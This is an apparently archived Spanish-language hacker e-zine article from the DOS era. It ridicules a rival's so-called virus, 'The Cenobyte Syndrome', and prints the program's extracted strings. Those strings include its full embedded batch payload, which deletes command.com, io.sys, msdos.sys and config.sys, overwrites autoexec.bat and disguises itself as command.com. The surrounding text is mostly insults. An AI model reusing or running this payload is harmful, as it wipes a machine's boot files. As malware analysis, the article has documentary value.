10 The Cenobyte Syndrome, un virus elite

eZine lover (@eZine)

Published in 

AntilammerZone

 · 14 Oct 2023

Al leer el articulo anterior, pudieron observar que el dijo haber hecho el virus en watcom c y en assembler (80x86). El virus en realidad no esta hecho en watcom c sino en Borland C++, y dudo mucho (demasiado), que tenga algo de assembler en el source code, salvo algo que pudo haber robado, porque no es capaz de generar nada propio.

Aqui tengo los exe, de dos de las versiones del 'virus' tcs. Al editar los exe podemos encontrar claramente el string del copyright, que dice Borland C++, y aunque no lo puedan creer, un bat metido dentro. Se ve que el virus, lo juro, no infecta absolutamente nada, sino que al ser ejecutado crea un bat y lo manda a ejecucion. Este bat borra, si leyeron bien borra, el io.sys, el command.com y el msdos.sys. Y como si fuera poco, y lo que no podia faltar porque el quiere figurar en todos lados, le mete al autoexec.bat un par de hechos que reberencian al grandisimo hijo de puta, bueno, grandisimo idiota de [Hellraiser], coronandose, ademas de lammer numero uno como el argentino mas fanatico de linux.

Me olvidaba, pone un string final que dice 'Game Over', clasico, el pibe lo unico que debe hacer en sus 'TEAMS' es jugar al Quake, como le pusieron en la board del Ezkracho TEAM.

Por si alguno no me cree, vean el strings del exe (aqui esta incluido el .bat que lleva en su interior).

-< /* que lo habias hecho en que el virus ? */ >- 

Borland C++ - Copyright 1991 Borland Intl. 

Null pointer assignment 
Divide error 
Abnormal program termination 
                         -=<[ The Cenobyte Syndrome ]>=- 
                           Programado por [Hellraiser] 
			                            Buenos Aires,  Argentina 1999 
echo CENOBYTE > com3 
echo CENOBYTE > com4 
                                    => %d <= 
copy tcs.exe c:\ >NUL 
attrib -h -s -r tcs.exe >NUL 
del tcs.exe >NUL 
cd \ 
attrib -r -s -h command.com >NUL 
del command.com >NUL 
attrib -h -r -s io.sys >NUL 
del io.sys >NUL 
attrib -h -r -s msdos.sys >NUL 
del msdos.sys >NUL 
echo @echo off > autoexec.bat 
echo echo. >> autoexec.bat 
echo echo                     -=<[ The Cenobyte Syndrome ]>=- >> autoexec.bat 
echo echo. >> autoexec.bat 
echo echo       Has sido contaminado con el virus de [Hellraiser], el argentino >> autoexec.bat 
echo echo       mas fanatico de Linux. Gracias por usar productos Microsofts. >> autoexec.bat 
echo echo. >> autoexec.bat 
echo echo                       Programado por [Hellraiser] 
echo pause >> autoexec.bat 
del config.sys >NUL 
ren tcs.exe command.com >NUL 
                                   Game Over 
echo CENOBYTE > com3 
echo CENOBYTE > com3 
echo CENOBYTE > com3 
echo CENOBYTE > com3 
echo CENOBYTE > com3 
echo CENOBYTE > com3 
echo CENOBYTE > com3 
echo CENOBYTE > com3 
echo CENOBYTE > com3 
echo CENOBYTE > com3 
echo CENOBYTE > com4 
echo CENOBYTE > com4 
echo CENOBYTE > com4 
echo CENOBYTE > com4 
echo CENOBYTE > com4 
echo CENOBYTE > com4 
echo CENOBYTE > com4 
echo CENOBYTE > com4 
echo CENOBYTE > com4 
echo CENOBYTE > com4 
pause >NUL 
pause >NUL 
pause >NUL 
pause >NUL 
pause >NUL 
pause >NUL 
pause >NUL 
pause >NUL 
pause >NUL 
pause >NUL 
pause >NUL 
(null) 
COMPAQ 
print scanf : floating point formats not linked 
COMSPEC 
COMSPEC

Como ven, es muy lammer este idiota. Hasta renombra su 'virus' como command.com. Es un gil de cuarta, es [Gilraiser].

Vaselin; "comprate un tarro porque aca llegue yo"